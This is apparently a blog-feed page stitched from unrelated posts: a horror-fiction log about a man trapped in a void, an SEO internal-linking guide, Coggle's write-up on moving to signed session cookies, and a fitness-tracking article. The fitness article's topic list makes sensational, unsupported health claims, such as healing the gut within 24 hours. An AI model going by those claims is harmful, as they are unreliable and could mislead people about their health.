Okay… hoooo… I-I need to relax for a minute, Jesus, god, shit. Holy… shit, shit, shit… I… just discovered a new property of this place. All this time, I've been thinking I might be walking on… some sort of… flat ground, if you will. I kept eye contact with little red as far as I could see, and it seems I could walk in a straight, flat path. Jesus, my head is buzzing right now, I think the adrenaline is still kicking… But, if my hypothesis is correct, and this really is some sort of reality… void, then there shouldn't be anything to walk on. Now that I think about, the whole time I've been in here, it's felt like… I'm walking, but I'm also swimming through something. And this something is thick, and form-fitting, it has this… pressure, which I know isn't the correct term, but goddamn it, this place makes no damn sense and I'm doing my best to understand it, okay?!
God… Sorry.
So, the best analogy I can come up with is… it's like I'm walking through really thick black gel. There's enough tension to keep me on a… "surface", but if I… imagine myself pressing down hard enough, I can descend. Wait. Wait, wait, wait, wait, wait, I think… I think I need to test this more, I'll be back.
Two months, seventeen days, two hours.
Navigation is largely affected by… conscious impulses to travel in a certain direction. So, this definitely isn't a complete reality gap, at least according to mine and Anna's theories. If-if it were I wouldn't have been able to move at all, since space wouldn't have existed. Holy shit, okay, okay, this makes a lot more sense than it did before, great, great job, Robert, you're getting there. …Come to think of it, I should've realized that sooner when I was able to move in a flat plane to and from little red. It also explains why I'm not dead from dehydration or hunger yet, time barely passes in here. Okay yeah, so, I stood right next to little red, and went straight… "down." Okay, from here on out, imagine little red as the origin of a 3D space. I went straight… down, right, yeah, and then… and then I was then able to come back "up" to little red again. I've also been able to "fly" above red. Movement in here is slow, like I said, gel analogy, best I can describe it by.
Two months, twenty-two days, three hours.
Reporting back for another update, red, SIR! Hahaha, come on red, lighten up. Ha! Pun not intended… Come on red, crack a little smile, it's funny!
… Fine, whatever. Ahem.
This place still seems like it barely follows Kejel's Laws of Reality Parameters. And by barely, I mean, really just barely. I'm pretty sure my math is right, but… hold on, I'm gonna check again…
Jesus. Yeah, yeah, pretty sure it's good still. Okay, this place… if we're using the standard Hume scale, I'm pretty sure I'm in a reality where the Hume Field is… point zero… four… ish. Yeah, really, really, really fucking low, so… Like I said above, space-time exists on a very minuscule scale, so my biology is not getting shot to hell and back because of any malnutrition, but that also means… I… I'm actually not sure what that also means…
Adding on from the last entry. I'm… I'm not sure how my biology will react in such a low Hume concentration, actually. I mostly worked with higher than average Hume Fields, and the reality benders we tested never had a Field lower than 0.8. This… this is gonna be a first. An all-time first. I remember Site-133's "Prommel Killer", they called it that because it broke the previous theory about the lowest limit of Hume concentration. Really expensive, really weird machine that brought down a small area to 0.4. 0.05 is… yeah.
I was lying. I was lying, last log… I… I'm lying to myself. My own body, and… little red here too… We're about the realest things in this place. And that means… over time… the Hume field's going to want to… equalize, and… I'm… I'm gonna go for now, I have some… some calculation to do again. Red, Anna, take note I'm using Kejel's Second, Third, and Fourth Laws, got it? Use… use 0.05 as the surrounding, my external field as… somewhere in between 1 and 1.4, use the Second Law's error estimation correction, and my internal as… as… as… shit. I'm not done yet.
I am real. I am super-real. Super duper real. Ultra real, the realest guy in a world of no-real.
You have no sense of humor as usual, red. I'm talking about the LSS, red. When we got sent here, I think… I think our reality got cranked up a notch. Red, didn't you pay attention in class? Hey, don't get fucking smart with me, red. Okay, the point is, the LSS surge got us up to… to…
Two months, eighteen days, seven hours.
No, red, not even fucking close, you must've converted Kejel's Third Law equation wrong. Because of the malfunctioning LSS we got blasted by, we're somewhere in between 2.2 and 3.6. Yes, that's good red, that's very good, because that means we have more time than we thought to… to… yes, red, before we fucking DIE, okay?!
Two months, twenty four days, five hours.
About three years. Four, if… If I don't interact too much. If… If I had had an LSS here, I could maybe stretch it out to… eight, maybe, that's best case scenario… But I have… I have to… I… know… but… but… three years. Three years, then it's past the point of no return. Ha. Hahahahaha. I should… I should definitely figure something out by then. I think I still should be pretty good for a while… At least… no, no, I won't be in here that long… I'll definitely figure something out…
Anna, what would we do with a case like this? I need your help, honey. That… that tingling I've been feeling… That's my Hume Field diffusing… My… my reality fading… Three years. I need to stabilize myself within three years.
I've been thinking… Anna and I, we had this theory… Even though the Hume Field is low, it's still a Hume Field. And precisely since it's so low, Hume diffusion should take quite a while. Now if… if I could… contain… recycle the fields, keep the diffusion from spreading too thin, I could… And I could also maybe… it's only a theory, but… It's worth a shot. But that means…
Hey, red. I… I'm gonna have to go for a bit. I want to test something, and you can't come with me. I… I'm sorry. No, no, red, I'm really, really sorry, I want you to come, I do, but… if we're together the diffusion will increase faster… We both need as much time as possible. I need to figure this place out more, and you need to make sure you keep all that info in your head. It's… red, come on. You- you'll be fine red, I know you will, you're tough. A lot tougher than me… it'll only be for a bit, red, but I need to see if I can find a way to keep us alive a bit longer. Maybe even get us out of here. If I can contain enough field, I can… I can maybe even get us out. No, no I'm not sure, but I need to find out. Red, we're talking about possibly escaping, okay? Yeah, it's a gap. A gap should have an end, like a… like the walls of a canyon, understand? I need to find a wall, and then, and then I can…
I'm sorry, red, I hope we're still friends when I come back.
I'm… I'm going now… I'll see you soon.
- Close.
Six months, ten days, five hours.
Hello again, little red. It's been a while.
You know… thinking back… I don't know what the hell I was so excited about. This place is… god, this place. This place is fucking… hell.
There's no end. It just goes on. And on. And on.
I traveled in one goddamn direction for two, damn, months. God, I'm so fucking stupid, why did I think I could get out? I'm thinking like those old European shits that thought the end of the world was at the horizon. Fucking stupid, Robert, stupid, just-just- GAAAAAAAAAAAH—
If I let myself fall down long enough would I eventually hit a bottom?
Ten months, 28 days, 15 hours.
There's no bottom. And fuck you, red.
I'm sorry, red, don't go out, I'm sorry I turned you off, come back, come back, please—
… I turned 40 today. Happy birthday, Robert.
I was adopted, did you know that? Yeah, my parents left me in a box on the side of a street. Got picked up by some American couple, which explains my not-so-Chinese names. I don't even know my original last name. Just thought I'd share. How about you, red?
Anna and I met on-site in 1988. God she was beautiful. She still is. It was our eyes. She has beautiful eyes. My eyes are grey, they're boring, but hers… God they're beautiful. Do you think… Do you think she's still worried about me, little red? Is she looking for me?
You know, red, you're a great listener. But I never hear you talk about yourself. Come on, don't be shy, there's no one else around, right? Hahaha, right? Hahaha… hahahahaha…
"I'm sorry, Robert, I'm afraid I can't do that." Hahaha, red, you're hilarious.
Were you married? Kids? Any family at all? Girlfriend? Boyfriend? Come on, red, I won't judge, just… talk to me, please. God, my head hurts. And my feet feel like they've been asleep for forever.
I worked at a comic store as a kid. So much cheaper back then, and I got free stuff at the end of each week. I liked Spiderman the best.
I was in a box, side of the street.
I… what the fuck… no. No. No, no, no, no, no, no, red, have you seen my picture? The picture red, Anna's picture, where is - come on, come on, where-where- Anna! ANNA! ANNA! Where did - no, no, no, no, no, please, please no, anything but, PLEASE.
It's fading, she's fading, she's fading, please, Anna, no, please, come on, sweetie, stay here, it's too soon, it's TOO SOON, my math isn't wrong, it's NOT WRONG, YOU SHOULD BE FINE. ANNA, ANNA, I can't hold you, come back, Anna, sweetie, honey, Anna please, I need you, I need you, please, please, don't go, I'm here, I'm still here. RED GET HELP. Anna, please, please, don't go, don't -
Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. Black hair, green eyes, 160. [Dr. Scranton repeats this for three hours.]
Anna and I got married in '91. We couldn't really get the nicest suit and dress we wanted because of work, but, damn, we both looked great. Anna looked better, of course. We just danced, and danced the whole night, got the whole week off. Even a job like mine lets you enjoy your honeymoon… So, come on red, open up, put 'er there, high five. Come on. Come on, red.
One year, two months, twenty-seven days.
AAAAAAA—
[The next recordings only play the control panel's automated voice giving times, with intervals of one to three days, with several month-long gaps in between as well; also intermixed are Dr. Scranton's sobbing, screaming, and mumbling. These recordings continue until the time reading reaches two years, seven months, and 28 days, after which they cease to pick up any sound until two months later.]
website-packages · 4 years
FastandSocial.com - 15 important tactics of Internal Linking - https://fastandsocial.com/15-important-tactics-of-internal-linking/

Every website owner is fighting to get backlinks from other websites to increase the PR & ranking on Google search results. But they are not concerned about the internal linking of the site, which is also a very important factor in search engine ranking. Let's first understand the difference between internal & external linking: internal linking is the links on the web pages of a website that point to other pages within the same website; external linking is when we put a link on one website to another website.

Why is internal linking important?

Internal linking is very important for any website as:

It increases the accessibility of the website for users & search engines
Search engines like Google reward you for doing things that make the website user's experience easier and better
It helps search engines & users to navigate the site easily
It is a perfect strategy for giving an extra boost to specific pages for specific keywords
It helps search engines to crawl deep web pages which are far from the main menu, navigation bar, or home page of the website
Anchor links help search engines to relate pages to the overall theme of the website

Internal linking to get top rankings on Google and other search engines

As said above, internal linking is very important, but I have seen many websites where every 5th or 6th word is linked to another page of the website, which actually looks very irritating. We should not abuse this opportunity by spamming.
I have consolidated some best practices of internal linking which are good from both the search engines' & users' point of view.

1- Utilize every opportunity for effective internal linking: add links in your navigation, header, or footer as text links to all your important pages and main sections of the website.

2- Internal page linking through a dynamic drop-down menu in DHTML or JavaScript is not a good way of linking, as search engines cannot follow links created in JavaScript; they can only follow simple text links. We should use simple text links to link all internal pages of the website.

3- Every page of the website should be at most 2 clicks away from the home page. E-commerce sites are usually very big, so search engines might face problems crawling & indexing all deep-level pages without appropriate internal linking.

4- Sometimes it is not possible to link every page of the website from the main menu, header, or footer of the website; in that case, internal contextual linking through web content is a good way to enhance the accessibility of the site.

5- Try to use relevant keywords as anchor text instead of using "Click here" etc.

6- Always use the same URL when you are linking to a specific page. For example, if you want to link your service page (www.example.com/service.html) from other pages of the site, then you should always use the same URL. Using different URLs to link the same page, like sometimes example.com/service.html & sometimes www.example.com/service.html, can create canonicalization issues.

7- Use breadcrumb navigation on sites that link to other pages often.

8- All internal links should work properly. Broken links are not good from either the users' or the search engines' perspective.

9- Use a sitemap with links to all important pages. It will help search engines & users to find pages at all levels. A sitemap is not only effective for SEO, but also has usability benefits.
10- Some web pages may be more popular in the search rankings and receive more links than the rest of your website. You can strengthen the weaker pages by including some contextual links to them from these stronger pages.

11- Check your server logs for 404 errors. Fix any broken links and redirect old linked-to pages to their new locations.

12- Try to use absolute URLs for internal linking, as they can help you when you're reusing content across multiple protocols (such as http and https). Absolute URLs provide indirect benefits in unforeseen situations, such as when someone steals your copy and forgets to change the internal links. Absolute URLs also show you exactly where your links lead, whereas links using "…/somewhere.html" structures are ambiguous and, especially in deep-content sites, often cause links to break when pages are moved around. Absolute URLs provide better control over optimization.

13- The linking page & anchor text should have a connection that is actually beneficial for users. Linking should not be done purely from the search engines' point of view.

14- Pages which are not very important from the users' & search engines' point of view should be linked with a nofollow attribute in the navigational parts of the site, because by linking to those less important pages we are passing our link PR to pages that aren't as important. For example: privacy policy pages, legal terms, thank-you pages, shopping carts, sitemaps, etc. are not very important, so we can put a nofollow tag on links to these pages. You can think of it this way: put nofollow tags on links to pages which are not important for the search engine result pages (SERPs), as people are unlikely to come to your site through those pages. Basically, for every link that you put in, ask yourself "does that page/section need more link weight?", and if the answer is no, nofollow it. Don't go overboard though, or else you won't have any internal links as far as the engines are concerned.
15- Make a list of the pages which are most important to you, from both the search engines' & users' perspective. Try to optimize the internal linking of these pages with appropriate anchor text. If you have several pages for the same product range, as on e-commerce sites, then link the main page to all the other pages, but you can put nofollow tags on the less important ones. Always put a link back from deeper pages to the main page of that specific category. A well-structured internal linking pattern will help search engines navigate your site in a better way & in the long run it will help you to get sitelinks in Google.

I am sure these internal linking techniques will be very helpful in optimizing your site in a better manner. Seo Consultants London
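To make a few of the tactics above concrete in markup form (the URLs here are placeholders, not real pages):

```html
<!-- Descriptive anchor text on one consistent, absolute URL (tactics 5, 6, 12) -->
<a href="https://www.example.com/service.html">web design services</a>

<!-- A low-value page flagged so it doesn't receive link weight (tactic 14) -->
<a href="https://www.example.com/privacy.html" rel="nofollow">Privacy Policy</a>
```

Because these are plain text links, search engine crawlers can follow the first one and will skip passing link weight through the second.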
coggle · 5 years
What We've Learned from Moving to Signed Cookies
We've recently moved Coggle's login sessions from a database-storage model to signed cookies, where the session data is stored in the session cookie itself.
There aren't many real-world examples of how to handle this migration, so we're sharing what we've learned doing this with node and express, and hopefully it'll be a useful and interesting read!
Part 1: How Old Sessions Worked
Previously we handled sessions with the express-session module and connect-mongo data store, and then we used passport to load our actual user data based on the session. Our middleware setup looked like this:
const session = require('express-session');
const MongoStore = require("connect-mongo")(session);
const sessionStore = new MongoStore({ ... });

// loads req.session from the database store, if the request included a valid session cookie
app.use(session({store: sessionStore, ...}));

// passport middleware loads req.user from our users collection based on the user ID stored in the session
app.use(passport.initialize());
app.use(passport.session());

// csrfMiddleware saves a CSRF token in the session
app.use(csrfMiddleware);
For each request that included a session cookie, the process was basically:
Check the connect-mongo sessions collection in the database to see if the cookie is valid
If it's valid, load the session data (the user ID and anti-CSRF token) from the sessions collection
Passport middleware loads req.user based on the user ID
Our actual app logic runs
Finally, if the session is updated (for example the cookie expiry is extended), re-save the session to the database. (express-session does this when the response is sent by hooking the response object)
The corresponding data for every single session cookie that hadn't expired had to be saved in the database. This added up to a lot of session records!
Before the migration, sessions were the biggest cause of writes to our database, a significant source of reads, and the majority of data we actually stored in our main database (the actual content of Coggle diagrams is stored separately). Our goal with moving to signed sessions was to significantly reduce the resources needed to host this.
Part of the reason for the volume of session data is that we have very long-lived session cookies, as we prioritise people being able to easily return to their Coggle diagrams. People forgetting which email address they used to log in and 'losing' their diagrams as a result is our biggest source of support requests.
Part 2: Choosing a Signed Cookie Implementation
An alternative to storing sessions in the database is to instead store the session data in the cookie itself, so when each page is loaded the session data needed is immediately available in the cookies of the request. This is possible as long as there's a cryptographic signature on the cookie to stop it from being tampered with. Someone can't change their cookie to log in to someone else's account, as they have no way to forge the cryptographic signature.
There isn't a formal standard for signing cookies, but the most common approach is to store a second cookie alongside each cookie to be signed, with a .sig extension to the name. This is the approach used by the cookies npm module, and the cookie-session middleware wraps this module into a convenient middleware which initialises req.session if the session cookie's signature is valid.
We already use JSON Web Tokens in Coggle for authentication between our back-end services, so we also considered using JWTs as session cookie values. There would be a number of advantages/disadvantages to this:
Public-keys could be used for signing, enabling our back-end services to verify signatures without access to the private signing key
Cookie values could be easily encrypted, as well as signed, by using the related JWE standard.
The additional information that makes JWTs portable (key ID, issuer, and using public-key signatures) also makes them bigger
Public-key signatures are significantly more expensive to sign and verify.
There are no readily available open source node modules for JWT-based session cookies.
Since we don't need encryption and would prefer to use symmetric keys, we chose the cookie-session middleware. If you're considering the same route, then think carefully about whether all of the data stored in your session should be unencrypted.
Part 3: Implementation
Secure Configuration:
The default for cookie-session (inherited from the cookies module), is to use the SHA1-HMAC signing algorithm. SHA1 has some weaknesses, so to be cautious we use SHA256-HMAC instead by passing our own Keygrip instance when creating the session middleware:
const signingKeys = new Keygrip([superSecretKey, ...], 'sha256');
const cookieSessionMiddleware = cookieSession({
    name: 'session-cookie',
    keys: signingKeys,
    maxAge: Session_Duration,
    httpOnly: true,
    sameSite: 'lax',
    signed: true,
    secure: true,
});
Handling CSRF:
We set SameSite=Lax on our session cookies, so it would not normally be possible for code on other sites to send potentially state-changing POST requests with the session cookie. However, in case people are using old browsers which do not support SameSite, or there is a bug in a browser's implementation, we still also use an anti-CSRF token for state-changing requests.
Previously the CSRF token for each session was stored in the database, and the value sent with each request from the client compared against this - with signed cookies it's instead stored in the cookie itself.
As the session cookie is stored as a HTTPOnly cookie, it is not possible for a CSRF script to read the value, even though it exists on the client.
It might be possible for malicious javascript to overwrite the HTTPOnly cookie, but in that case the cookie signature would be invalid.
This CSRF protection set-up is definitely a compromise, but as Coggle isn't handling payments, we think it's reasonable.
Migrating Old Sessions
It's important to migrate existing sessions so we don't log out users - running both the express-session and cookie-session middleware simultaneously isn't possible, as they both hook req.session and the response object.
As a result, we had to extract the logic from express-session which actually reads and verifies cookies (the getcookie function), and manually check the connect-mongo store, which is relatively straightforward:
const session = require('express-session'); // just for passing to connect-mongo, not used as middleware!
const MongoStore = require("connect-mongo")(session);
const legacySessionStore = new MongoStore({ ... });

const loadLegacySession = function(req, callback){
    const session_id = getcookie(req, legacyCookieName, [legacyCookieSecret]);
    if(session_id){
        legacySessionStore.get(session_id, function(err, session){
            return callback(err, session_id, session);
        });
    }else{
        return callback(null, null, null);
    }
};
With this in place, the final middleware for migrating sessions is straightforward. The migration is only temporary - once all old sessions have expired, we'll be able to just use the new cookieSessionMiddleware directly instead.
const sessionMiddleware = function(req, res, next){
    // first delegate to the new session middleware:
    cookieSessionMiddleware(req, res, function(err){
        if(err) return next(err);
        // then, ONLY IF there's no user ID in the new style
        // session, try to load one from the legacy session
        // so we can migrate it:
        if(!(req.session && req.session.passport && req.session.passport.user)){
            loadLegacySession(req, function(err, legacySessionID, legacySession){
                if(err) return next(err);
                // if there was a passport user ID in the old
                // session, migrate it:
                if(legacySession && legacySession.passport && legacySession.passport.user){
                    req.session.passport = {user: legacySession.passport.user};
                    // also migrate any existing CSRF token, so
                    // CSRF tokens used in pages which are already
                    // open remain valid:
                    if(legacySession._csrf){
                        req.session.csrf = legacySession._csrf;
                    }
                }
                // delete the old session:
                if(legacySessionID){
                    deleteLegacySession(legacySessionID, req, res);
                }
                return next();
            });
        }else{
            // if we have an authed session from the new cookie
            // already then we're done:
            return next();
        }
    });
};
After this, the passport middleware works exactly the same as before, loading req.user from session.passport.user.
Part 4: The Results!
We deployed the new sessions around January 27th. Based on one week either side of that, we saw some dramatic differences:
Database update operations, and corresponding db journal data, were reduced by approximately 80%, from 0.4MB/s to 0.08MB/s
Database volume busy time (which previously limited our peak scaling), reduced from approximately 15% to approximately 3%. In theory we can now handle peaks of over 30x our normal traffic volume, instead of peaks of only 7x!
(The reduction in the read ops of two of the volumes is primarily because they were being used as syncing sources for our off-site replicas - less journal data means less to be read for syncing)
And finally, 311 GB of session data and corresponding indexes can eventually be dropped from our database (multiplied across replicas, that's over 1.5TB of disk space, or about $160/month)
Hopefully this has been an interesting read. If you thought we were crazy to store our sessions in MongoDB in the first place, well, we also used to store the entire contents of Coggle documents in a MongoDB database too... maybe we'll write about that next!
Posted by James, Feb 2020.
How To Track Results (And Not Fall Into the Trap That Ruins 95% of Well-Thought Out Diets)
Whether you're just getting started, or you're a longtime fitness pro, you'll never get the results you're dreaming of if you don't accurately and properly track your progress.
A lot of beginners get discouraged and quit because they're not seeing fast results, or because the scale isn't tipping in their favor.
Similarly, many seasoned gym rats get complacent and stop being as vigilant about tracking their progress because they think they've got their routine down to a science.
Both are doing it wrong.
You see, by consistently tracking your progress, you not only collect important data you can use to steadily make adjustments to your exercise and diet regimens, but you also keep yourself motivated to stay in it to win it.
Here are the best methods for tracking your progress over the long run (try one or more of these methods):
Use the scale wisely. Remember that a scale only gives you a rough estimate of your weight on a daily basis. Depending on your monthly cycle (yes, guys, you have one too) the amount of water your body retains will fluctuate dramatically. So if you're not taking regular readings and averaging them out over weeks and months at a time, you're giving yourself false hope or false terror every time you see a quick drop or spike in your weight. For more accurate results, use a variety of metrics to track your progress over time.
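The "average them out" advice above can be made concrete with a tiny script. This is just a sketch using made-up readings (a spreadsheet works just as well):

```python
from statistics import mean

def weekly_averages(daily_weights, window=7):
    """Average daily weigh-ins over consecutive 7-day windows,
    smoothing out day-to-day water-weight noise."""
    return [round(mean(daily_weights[i:i + window]), 1)
            for i in range(0, len(daily_weights), window)
            if len(daily_weights[i:i + window]) == window]

# Two weeks of made-up daily readings in pounds:
weights = [180.2, 181.5, 179.8, 180.9, 180.1, 181.0, 179.5,
           179.9, 180.4, 178.8, 179.6, 179.0, 179.8, 178.5]
print(weekly_averages(weights))  # → [180.4, 179.4]
```

Comparing 180.4 to 179.4 reveals a genuine one-pound weekly trend that a single 181.5 reading would have completely hidden.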
Use a measuring tape. The same as with a scale, this can fluctuate throughout the month.
But it's useful to take a measurement of some key areas of your body once a week and chart how they shrink as you progress. The main areas you should measure (and log in a journal) are your:
Waist
Hips
Thighs
Chest
Arms
Calves
Use calipers or a scientific method of body fat analysis. The main scientific options for measuring body fat are bioelectrical impedance scales (somewhat inaccurate), DEXA/BodPod (pricey, but accurate), and underwater testing (also pricey, but accurate). As for calipers, make sure you do it yourself or have the same person doing it for you each time (I do it myself every 2 weeks), since variations in caliper grip can often cause very inaccurate readings. Body fat scales are also notorious for being inaccurate (often as much as 3-5% off), BUT if you use them consistently, you'll get consistent readings. So even if you can't tell what your exact body fat percentage is, you can tell how much body fat you've lost so far.
When calculating, bear in mind that an average body fat percentage for women is between 25% and 32%, and for men, it's between 18% and 24%.
Most people who are bodybuilding have lower fat levels than this - to see your abs through your skin, if you're a woman you'll need a body fat percentage in (or just below) the 11-14% range, and if you're a man, below the 10-12% range.
Just keep in mind that it's unhealthy to have too low a level of body fat; at some point, having too little fat on your body can start to powerfully affect some of your body's natural processes.
This is especially dangerous for women of child-bearing age who may become pregnant - if you're going to grow a baby, you need ample fat on your body to be able to nourish that child and eventually produce breast milk for the little tyke.
Here's a quick chart that illustrates body fat percentage ranges for different body types:
Classification                 Men         Women
Do not go lower than:          4-5%        10-11%
Athletic body:                 6-12%       13-19%
Generally fit body:            13-17%      20-24%
Average body:                  18-24%      25-32%
Overweight body:               25%+        33%+
And here's a chart that illustrates healthy/fit body fat percentage ranges based on age:
Age                               Men (Fit/Athletic)                      Women (Fit/Athletic)
18-30 y.o.                      10-18%                                       20-25%
31-50 y.o.                      16-24%                                       22-29%
Over 50 y.o.                  16-29% (Fit to Average)              20-36% (Fit to Average)
If you are over 50 y.o., read this: Men and women over 50 should consult with their doctors about their ideal body fat, because it varies widely depending on the individual and their health. For men who are 50+ and have average builds, a body fat percentage below 15% or above 30% is usually considered unhealthy (as opposed to merely not ideal). For women over 50, a body fat percentage lower than 20% or higher than 36% can sometimes be dangerous.
Also, as you age, your muscles and bones naturally lose their density and size. At this time, a higher body fat percentage is not just acceptable, it's actually healthier.
Take a picture in the mirror. You can do this as often or as sparingly as you want, but it can be a great way to measure your progress - and makes for a great mash-up on YouTube or in a slideshow later on. As with any of these methods, if you're hoping to see a huge difference in a week or two, you may be disappointed (though not always!). But, you'll be amazed how different your body looks within a couple of months if you stick to your diet - and you'll be able to see your progress over time in a series of photos, which can be really inspirational!
You'll be able to get within 5% of your percentage, which is ideal for both progress checks and also for filling in the bonus "So Easy A Caveman Can Do It" Calculator, so you have the most accurate calorie totals!
Write down your calories. You've got to write down everything - everything - that you eat, at least in the beginning. That means candy bars, beers, that half a slice of cake you had at the office birthday party for Irene on Friday, everything. If you're guessing in the beginning, you don't have an accurate picture, and you're not going to be able to analyze your habits to see where you need to make improvements.
Write down your exercises. You've got to track your strength-training as well as your cardio. A typical exercise journal will contain the exercises you did, how many sets and reps of each and the amount of weight you were throwing around. It should also have a section for each day of exercise - what kind did you do? How many calories did the machine say you burned (or did you calculate that you burned, if you worked out in the great outdoors?) Was it easy, moderate, intense? Keeping an exercise journal is more than an important tool for keeping yourself on the right track, it's also an exercise in honesty and accountability. Are you really squeezing out each of those last reps? Are you flipping back through pages and realizing that you're leaving the gym too early, too often? An exercise journal can tell you not just about how strong you're getting, but how committed you are, as well.
Use an Excel spreadsheet or Microsoft Word table design. As with personal finance, the most popular way to track your fitness progress is with an Excel spreadsheet or Word table. With just a basic knowledge of Excel, you can create graphs, charts and more that will give you a big-picture view of your efforts thus far. When creating a spreadsheet, make sure you have boxes designated for weight, measurements and body fat percentage. Don't lose heart if your numbers aren't moving as quickly as you want them to! You may go a week or two without seeing your weight change, for instance, because you're building muscle and burning fat at the same time - so it's important to know what your measurements and body fat percentage are.
Use a web site or app specifically designed to help you track your progress. There are many of these, running the gamut from highly detailed and useful (a few of them) to mostly bunk (most of them.) It's a shame that the cottage industry that has sprung up around weight-loss since the beginning of the obesity epidemic in the 1990s in America has attracted its fair share of snake-oil salesmen and hucksters. However, there are some very good sites out there that can be very helpful to you as you make your journey toward the body of your dreams. Here are the best websites to track your progress:
FitDay (this is my hands down favorite tracker)
The Daily Plate
Skinnyo
Bodybuilding.com
Use my secret on-the-go tracking "weapon", for times that it's hard/impossible to get online. If I can't access FitDay (or my personal journals at home), I always use one of the following and suggest you do the same:
"Notes" from the iPhone are usually sent automatically to your email address.
Evernote updates automatically and can be accessed from any computer.
The harsh truth is: You can diet and exercise all you want, but if you don't have good, consistent measurements, you'll either burn out or fail to capitalize on opportunities to improve your results over time.
So, follow the suggestions above and/or get right to it with the following steps.
Action Steps:
Hop on Google Images and search "body fat % for (your gender)"
If you have calipers or access to another method, use them to estimate your body fat %
Interested in losing weight? Then click below to see the exact steps I took to lose weight and keep it off for good...
Read the previous article about "Nutrition Basics for Fast Pain Relief (and Weight Loss)"
Read the next article about "Advanced Fat Loss - Calorie Cycling, Carb Cycling and Intermittent Fasting"
Moving forward, there are several other articles/topics I'll share so you can lose weight even faster, and feel great doing it.
Below is a list of these topics and you can use this Table of Contents to jump to the part that interests you the most.
Topic 1: How I Lost 30 Pounds In 90 Days - And How You Can Too
Topic 2: How I Lost Weight By Not Following The Mainstream Media And Health Guru's Advice - Why The Health Industry Is Broken And How We Can Fix It
Topic 3: The #1 Ridiculous Diet Myth Pushed By 95% Of Doctors And "experts" That Is Keeping You From The Body Of Your Dreams
Topic 4: The Dangers of Low-Carb and Other "No Calorie Counting" Diets
Topic 5: Why Red Meat May Be Good For You And Eggs Won't Kill You
Topic 6: Two Critical Hormones That Are Quietly Making Americans Sicker and Heavier Than Ever Before
Topic 7: Everything Popular Is Wrong: The Real Key To Long-Term Weight Loss
Topic 8: Why That New Miracle Diet Isn't So Much of a Miracle After All (And Why You're Guaranteed To Hate Yourself On It Sooner or Later)
Topic 9: A Nutrition Crash Course To Build A Healthy Body and Happy Mind
Topic 10: How Much You Really Need To Eat For Steady Fat Loss (The Truth About Calories and Macronutrients)
Topic 11: The Easy Way To Determining Your Calorie Intake
Topic 12: Calculating A Weight Loss Deficit
Topic 13: How To Determine Your Optimal "Macros" (And How The Skinny On The 3-Phase Extreme Fat Loss Formula)
Topic 14: Two Dangerous "Invisible Thorn" Foods Masquerading as "Heart Healthy Super Nutrients"
Topic 15: The Truth About Whole Grains And Beans: What Traditional Cultures Know About These So-called "Healthy Foods" That Most Americans Don't
Topic 16: The Inflammation-Reducing, Immune-Fortifying Secret of All Long-Living Cultures (This 3-Step Process Can Reduce Chronic Pain and Heal Your Gut in Less Than 24 Hours)
Topic 17: The Foolproof Immune-enhancing Plan That Cleanses And Purifies Your Body, While "patching Up" Holes, Gaps, And Inefficiencies In Your Digestive System (And How To Do It Without Wasting $10+ Per "meal" On Ridiculous Juice Cleanses)
Topic 18: The Great Soy Myth (and The Truth About Soy in Eastern Asia)
Topic 19: How Chemicals In Food Make Us Fat (Plus 10 Banned Chemicals Still in the U.S. Food Supply)
Topic 20: 10 Banned Chemicals Still in the U.S. Food Supply
Topic 21: How To Protect Yourself Against Chronic Inflammation (What Time Magazine Calls A "Secret Killer")
Topic 22: The Truth About Buying Organic: Secrets The Health Food Industry Doesn't Want You To Know
Topic 23: Choosing High Quality Foods
Topic 24: A Recipe For Rapid Aging: The "Hidden" Compounds Stealing Your Youth, Minute by Minute
Topic 25: 7 Steps To Reduce AGEs and Slow Aging
Topic 26: The 10-second Trick That Can Slash Your Risk Of Cardiovascular Mortality By 37% (Most Traditional Cultures Have Done This For Centuries, But The Pharmaceutical Industry Would Be Up In Arms If More Modern-day Americans Knew About It)
Topic 27: How To Clean Up Your Liver and Vital Organs
Topic 28: The Simple Detox 'Cheat Sheet': How To Easily and Properly Cleanse, Nourish, and Rid Your Body of Dangerous Toxins (and Build a Lean Well-Oiled "Machine" in the Process)
Topic 29: How To Deal With the "Stress Hormone" Before It Deals With You
Topic 30: 7 Common Sense Ways to Have Uncommon Peace of Mind (or How To Stop Your "Stress Hormone" In Its Tracks)
Topic 31: How To Sleep Like A Baby (And Wake Up Feeling Like A Boss)
Topic 32: The 8-step Formula That Finally "fixes" Years Of Poor Sleep, Including Trouble Falling Asleep, Staying Asleep, And Waking Up Rested (If You Ever Find Yourself Hitting The Snooze Every Morning Or Dozing Off At Work, These Steps Will Change Your Life Forever)
Topic 33: For Even Better Leg Up And/or See Faster Results In Fixing Years Of Poor Sleep, Including Trouble Falling Asleep, Staying Asleep, And Waking Up Rested, Do The Following:
Topic 34: Solution To Overcoming Your Mental Barriers and Cultivating A Winner's Mentality
Topic 35: Part 1 of 4: Solution To Overcoming Your Mental Barriers and Cultivating A Winner's Mentality
Topic 36: Part 2 of 4: Solution To Overcoming Your Mental Barriers and Cultivating A Winner's Mentality
Topic 37: Part 3 of 4: Solution To Overcoming Your Mental Barriers and Cultivating A Winner's Mentality
Topic 38: Part 4 of 4: Solution To Overcoming Your Mental Barriers and Cultivating A Winner's Mentality
Topic 39: How To Beat Your Mental Roadblocks And Why It Can Be The Difference Between A Happy, Satisfying Life And A Sad, Fearful Existence (These Strategies Will Reduce Stress, Increase Productivity And Show You How To Fulfill All Your Dreams)
Topic 40: Maximum Fat Loss in Minimum Time: The Body Type Solution To Quick, Lasting Results
Topic 41: If You Want Maximum Results In Minimum Time You're Going To Have To Work Out (And Workout Hard, At That)
Topic 42: Food Planning For Maximum Fat Loss In Minimum Time
Topic 43: How To Lose Weight Fast If You're in Chronic Pain
Topic 44: Nutrition Basics for Fast Pain Relief (and Weight Loss)
Topic 45: How To Track Results (And Not Fall Into the Trap That Ruins 95% of Well-Thought Out Diets)
Topic 46: Advanced Fat Loss - Calorie Cycling, Carb Cycling and Intermittent Fasting
Topic 47: Advanced Fat Loss - Part I: Calorie Cycling
Topic 48: Advanced Fat Loss - Part II: Carb Cycling
Topic 49: Advanced Fat Loss - Part III: Intermittent Fasting
Topic 50: Putting It All Together
Learn more by visiting our website here: invigoratenow.com
ronijashworth · 5 years
SearchLove London 2019: The Great Big Round Up
